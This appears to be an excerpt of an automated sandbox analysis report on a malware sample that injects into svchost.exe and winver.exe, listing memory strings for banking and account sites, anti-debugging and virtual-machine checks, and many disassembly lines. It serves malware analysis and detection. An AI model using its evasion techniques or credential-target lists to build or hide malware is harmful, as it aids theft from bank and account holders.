                Source: 341G64J42.12.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 341G64J42.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: 341G64J42.12.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: 341G64J42.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 341G64J42.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: tFEgkRNveR.exe, 0000000B.00000002.3127494232.0000000000DAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll85
                Source: winver.exe, 0000000C.00000002.3130775336.0000000007691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware
                Source: 341G64J42.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 341G64J42.12.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: 341G64J42.12.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 341G64J42.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 341G64J42.12.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: winver.exe, 0000000C.00000002.3130775336.0000000007691000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: saction PasswordVMware20,11696492231^
                Source: 341G64J42.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\z6tNjJC614.exeAPI call chain: ExitProcess graph end nodegraph_0-100924
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\winver.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0397096E rdtsc 8_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00417A83 LdrLoadDll,8_2_00417A83
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00583F09 BlockInput,0_2_00583F09
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00513B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00513B3A
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00545A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00545A7C
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_00514B37 LoadLibraryA,GetProcAddress,0_2_00514B37
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_01037448 mov eax, dword ptr fs:[00000030h]0_2_01037448
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_010374A8 mov eax, dword ptr fs:[00000030h]0_2_010374A8
                Source: C:\Users\user\Desktop\z6tNjJC614.exeCode function: 0_2_01035E38 mov eax, dword ptr fs:[00000030h]0_2_01035E38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03928397 mov eax, dword ptr fs:[00000030h]8_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03928397 mov eax, dword ptr fs:[00000030h]8_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03928397 mov eax, dword ptr fs:[00000030h]8_2_03928397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392E388 mov eax, dword ptr fs:[00000030h]8_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392E388 mov eax, dword ptr fs:[00000030h]8_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392E388 mov eax, dword ptr fs:[00000030h]8_2_0392E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395438F mov eax, dword ptr fs:[00000030h]8_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395438F mov eax, dword ptr fs:[00000030h]8_2_0395438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE3DB mov eax, dword ptr fs:[00000030h]8_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE3DB mov eax, dword ptr fs:[00000030h]8_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE3DB mov ecx, dword ptr fs:[00000030h]8_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE3DB mov eax, dword ptr fs:[00000030h]8_2_039DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D43D4 mov eax, dword ptr fs:[00000030h]8_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D43D4 mov eax, dword ptr fs:[00000030h]8_2_039D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039EC3CD mov eax, dword ptr fs:[00000030h]8_2_039EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A3C0 mov eax, dword ptr fs:[00000030h]8_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A3C0 mov eax, dword ptr fs:[00000030h]8_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A3C0 mov eax, dword ptr fs:[00000030h]8_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A3C0 mov eax, dword ptr fs:[00000030h]8_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A3C0 mov eax, dword ptr fs:[00000030h]8_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A3C0 mov eax, dword ptr fs:[00000030h]8_2_0393A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039383C0 mov eax, dword ptr fs:[00000030h]8_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039383C0 mov eax, dword ptr fs:[00000030h]8_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039383C0 mov eax, dword ptr fs:[00000030h]8_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039383C0 mov eax, dword ptr fs:[00000030h]8_2_039383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B63C0 mov eax, dword ptr fs:[00000030h]8_2_039B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394E3F0 mov eax, dword ptr fs:[00000030h]8_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394E3F0 mov eax, dword ptr fs:[00000030h]8_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394E3F0 mov eax, dword ptr fs:[00000030h]8_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039663FF mov eax, dword ptr fs:[00000030h]8_2_039663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039403E9 mov eax, dword ptr fs:[00000030h]8_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039403E9 mov eax, dword ptr fs:[00000030h]8_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039403E9 mov eax, dword ptr fs:[00000030h]8_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039403E9 mov eax, dword ptr fs:[00000030h]8_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039403E9 mov eax, dword ptr fs:[00000030h]8_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039403E9 mov eax, dword ptr fs:[00000030h]8_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039403E9 mov eax, dword ptr fs:[00000030h]8_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039403E9 mov eax, dword ptr fs:[00000030h]8_2_039403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392C310 mov ecx, dword ptr fs:[00000030h]8_2_0392C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A08324 mov eax, dword ptr fs:[00000030h]8_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A08324 mov ecx, dword ptr fs:[00000030h]8_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A08324 mov eax, dword ptr fs:[00000030h]8_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A08324 mov eax, dword ptr fs:[00000030h]8_2_03A08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03950310 mov ecx, dword ptr fs:[00000030h]8_2_03950310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396A30B mov eax, dword ptr fs:[00000030h]8_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396A30B mov eax, dword ptr fs:[00000030h]8_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396A30B mov eax, dword ptr fs:[00000030h]8_2_0396A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B035C mov eax, dword ptr fs:[00000030h]8_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B035C mov eax, dword ptr fs:[00000030h]8_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B035C mov eax, dword ptr fs:[00000030h]8_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B035C mov ecx, dword ptr fs:[00000030h]8_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B035C mov eax, dword ptr fs:[00000030h]8_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B035C mov eax, dword ptr fs:[00000030h]8_2_039B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039FA352 mov eax, dword ptr fs:[00000030h]8_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D8350 mov ecx, dword ptr fs:[00000030h]8_2_039D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B2349 mov eax, dword ptr fs:[00000030h]8_2_039B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D437C mov eax, dword ptr fs:[00000030h]8_2_039D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A0634F mov eax, dword ptr fs:[00000030h]8_2_03A0634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396E284 mov eax, dword ptr fs:[00000030h]8_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0396E284 mov eax, dword ptr fs:[00000030h]8_2_0396E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B0283 mov eax, dword ptr fs:[00000030h]8_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B0283 mov eax, dword ptr fs:[00000030h]8_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B0283 mov eax, dword ptr fs:[00000030h]8_2_039B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039402A0 mov eax, dword ptr fs:[00000030h]8_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039402A0 mov eax, dword ptr fs:[00000030h]8_2_039402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C62A0 mov eax, dword ptr fs:[00000030h]8_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C62A0 mov ecx, dword ptr fs:[00000030h]8_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C62A0 mov eax, dword ptr fs:[00000030h]8_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C62A0 mov eax, dword ptr fs:[00000030h]8_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C62A0 mov eax, dword ptr fs:[00000030h]8_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C62A0 mov eax, dword ptr fs:[00000030h]8_2_039C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A2C3 mov eax, dword ptr fs:[00000030h]8_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A2C3 mov eax, dword ptr fs:[00000030h]8_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A2C3 mov eax, dword ptr fs:[00000030h]8_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A2C3 mov eax, dword ptr fs:[00000030h]8_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393A2C3 mov eax, dword ptr fs:[00000030h]8_2_0393A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039402E1 mov eax, dword ptr fs:[00000030h]8_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039402E1 mov eax, dword ptr fs:[00000030h]8_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039402E1 mov eax, dword ptr fs:[00000030h]8_2_039402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A062D6 mov eax, dword ptr fs:[00000030h]8_2_03A062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392823B mov eax, dword ptr fs:[00000030h]8_2_0392823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392A250 mov eax, dword ptr fs:[00000030h]8_2_0392A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03936259 mov eax, dword ptr fs:[00000030h]8_2_03936259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039EA250 mov eax, dword ptr fs:[00000030h]8_2_039EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039EA250 mov eax, dword ptr fs:[00000030h]8_2_039EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B8243 mov eax, dword ptr fs:[00000030h]8_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B8243 mov ecx, dword ptr fs:[00000030h]8_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039E0274 mov eax, dword ptr fs:[00000030h]8_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03934260 mov eax, dword ptr fs:[00000030h]8_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03934260 mov eax, dword ptr fs:[00000030h]8_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03934260 mov eax, dword ptr fs:[00000030h]8_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392826B mov eax, dword ptr fs:[00000030h]8_2_0392826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A0625D mov eax, dword ptr fs:[00000030h]8_2_03A0625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B019F mov eax, dword ptr fs:[00000030h]8_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B019F mov eax, dword ptr fs:[00000030h]8_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B019F mov eax, dword ptr fs:[00000030h]8_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B019F mov eax, dword ptr fs:[00000030h]8_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392A197 mov eax, dword ptr fs:[00000030h]8_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392A197 mov eax, dword ptr fs:[00000030h]8_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392A197 mov eax, dword ptr fs:[00000030h]8_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03970185 mov eax, dword ptr fs:[00000030h]8_2_03970185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039EC188 mov eax, dword ptr fs:[00000030h]8_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039EC188 mov eax, dword ptr fs:[00000030h]8_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D4180 mov eax, dword ptr fs:[00000030h]8_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D4180 mov eax, dword ptr fs:[00000030h]8_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A061E5 mov eax, dword ptr fs:[00000030h]8_2_03A061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AE1D0 mov eax, dword ptr fs:[00000030h]8_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AE1D0 mov eax, dword ptr fs:[00000030h]8_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]8_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AE1D0 mov eax, dword ptr fs:[00000030h]8_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039AE1D0 mov eax, dword ptr fs:[00000030h]8_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F61C3 mov eax, dword ptr fs:[00000030h]8_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F61C3 mov eax, dword ptr fs:[00000030h]8_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039601F8 mov eax, dword ptr fs:[00000030h]8_2_039601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DA118 mov ecx, dword ptr fs:[00000030h]8_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DA118 mov eax, dword ptr fs:[00000030h]8_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DA118 mov eax, dword ptr fs:[00000030h]8_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DA118 mov eax, dword ptr fs:[00000030h]8_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F0115 mov eax, dword ptr fs:[00000030h]8_2_039F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE10E mov eax, dword ptr fs:[00000030h]8_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE10E mov ecx, dword ptr fs:[00000030h]8_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE10E mov eax, dword ptr fs:[00000030h]8_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE10E mov eax, dword ptr fs:[00000030h]8_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE10E mov ecx, dword ptr fs:[00000030h]8_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE10E mov eax, dword ptr fs:[00000030h]8_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE10E mov eax, dword ptr fs:[00000030h]8_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE10E mov ecx, dword ptr fs:[00000030h]8_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE10E mov eax, dword ptr fs:[00000030h]8_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039DE10E mov ecx, dword ptr fs:[00000030h]8_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03960124 mov eax, dword ptr fs:[00000030h]8_2_03960124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392C156 mov eax, dword ptr fs:[00000030h]8_2_0392C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C8158 mov eax, dword ptr fs:[00000030h]8_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A04164 mov eax, dword ptr fs:[00000030h]8_2_03A04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03A04164 mov eax, dword ptr fs:[00000030h]8_2_03A04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03936154 mov eax, dword ptr fs:[00000030h]8_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03936154 mov eax, dword ptr fs:[00000030h]8_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C4144 mov eax, dword ptr fs:[00000030h]8_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C4144 mov eax, dword ptr fs:[00000030h]8_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C4144 mov ecx, dword ptr fs:[00000030h]8_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C4144 mov eax, dword ptr fs:[00000030h]8_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C4144 mov eax, dword ptr fs:[00000030h]8_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0393208A mov eax, dword ptr fs:[00000030h]8_2_0393208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F60B8 mov eax, dword ptr fs:[00000030h]8_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039F60B8 mov ecx, dword ptr fs:[00000030h]8_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039280A0 mov eax, dword ptr fs:[00000030h]8_2_039280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C80A8 mov eax, dword ptr fs:[00000030h]8_2_039C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B20DE mov eax, dword ptr fs:[00000030h]8_2_039B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392C0F0 mov eax, dword ptr fs:[00000030h]8_2_0392C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039720F0 mov ecx, dword ptr fs:[00000030h]8_2_039720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]8_2_0392A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039380E9 mov eax, dword ptr fs:[00000030h]8_2_039380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B60E0 mov eax, dword ptr fs:[00000030h]8_2_039B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394E016 mov eax, dword ptr fs:[00000030h]8_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394E016 mov eax, dword ptr fs:[00000030h]8_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394E016 mov eax, dword ptr fs:[00000030h]8_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0394E016 mov eax, dword ptr fs:[00000030h]8_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B4000 mov ecx, dword ptr fs:[00000030h]8_2_039B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D2000 mov eax, dword ptr fs:[00000030h]8_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D2000 mov eax, dword ptr fs:[00000030h]8_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D2000 mov eax, dword ptr fs:[00000030h]8_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D2000 mov eax, dword ptr fs:[00000030h]8_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D2000 mov eax, dword ptr fs:[00000030h]8_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D2000 mov eax, dword ptr fs:[00000030h]8_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D2000 mov eax, dword ptr fs:[00000030h]8_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D2000 mov eax, dword ptr fs:[00000030h]8_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039C6030 mov eax, dword ptr fs:[00000030h]8_2_039C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392A020 mov eax, dword ptr fs:[00000030h]8_2_0392A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0392C020 mov eax, dword ptr fs:[00000030h]8_2_0392C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03932050 mov eax, dword ptr fs:[00000030h]8_2_03932050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039B6050 mov eax, dword ptr fs:[00000030h]8_2_039B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0395C073 mov eax, dword ptr fs:[00000030h]8_2_0395C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039D678E mov eax, dword ptr fs:[00000030h]8_2_039D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_039307AF mov eax, dword ptr fs:[00000030h]8_2_039307AF
